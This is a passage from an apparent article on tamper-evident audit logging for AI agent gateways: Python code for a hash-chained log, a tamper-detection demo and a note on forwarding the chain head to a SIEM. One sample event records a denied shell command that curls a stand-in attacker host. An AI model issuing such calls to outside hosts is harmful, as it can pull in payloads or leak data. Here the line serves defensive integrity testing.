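    """Hash commits to the previous record's hash, the position and the entry.
    Canonical JSON keeps key order from changing the digest."""
    body = json.dumps({"seq": seq, "entry": entry}, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode()).hexdigest()


def append(log, entry):
    """Append one audit record; returns the record so its hash can be forwarded."""
    prev_hash = log[-1]["hash"] if log else GENESIS
    seq = len(log)
    record = {"seq": seq, "entry": entry, "prev": prev_hash,
              "hash": _digest(prev_hash, seq, entry)}
    log.append(record)
    return record


def verify(log, anchored_head=None):
    """Recompute the whole chain. Returns (True, None) or (False, index of the
    first bad record; len(log) if the chain is intact but does not end at the
    anchored head, i.e. the tail was rewritten or truncated)."""
    prev_hash = GENESIS
    for i, record in enumerate(log):
        if record["seq"] != i or record["prev"] != prev_hash:
            return False, i
        if record["hash"] != _digest(prev_hash, i, record["entry"]):
            return False, i
        prev_hash = record["hash"]
    if anchored_head is not None and prev_hash != anchored_head:
        return False, len(log)
    return True, None


def build_sample_log():
    """Constructed agent-gateway events (hypothetical tools and paths)."""
    log = []
    append(log, {"ts": "2026-04-20T10:00:00Z", "tool": "shell.exec",
                 "argv": ["ls", "/srv"], "approved": True})
    append(log, {"ts": "2026-04-20T10:00:03Z", "tool": "fs.read",
                 "path": "/srv/data/report.csv", "approved": True})
    append(log, {"ts": "2026-04-20T10:00:07Z", "tool": "shell.exec",
                 "argv": ["curl", "http://attacker.example"], "approved": False})
    return log


if __name__ == "__main__":
    log = build_sample_log()
    head = log[-1]["hash"]  # this value is what gets forwarded to the SIEM
    log[2]["entry"]["approved"] = True
    print(verify(log), verify(log, anchored_head=head))
```

Flipping the denied record to approved is caught by the local walk alone. Flipping it and recomputing the record's hash is not, which is why the real-time forwarding in the table is part of the integrity design rather than a reporting convenience.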

Credit to OX for doing the work and setting the record straight. Their full report is available here: The Mother of All AI Supply Chains.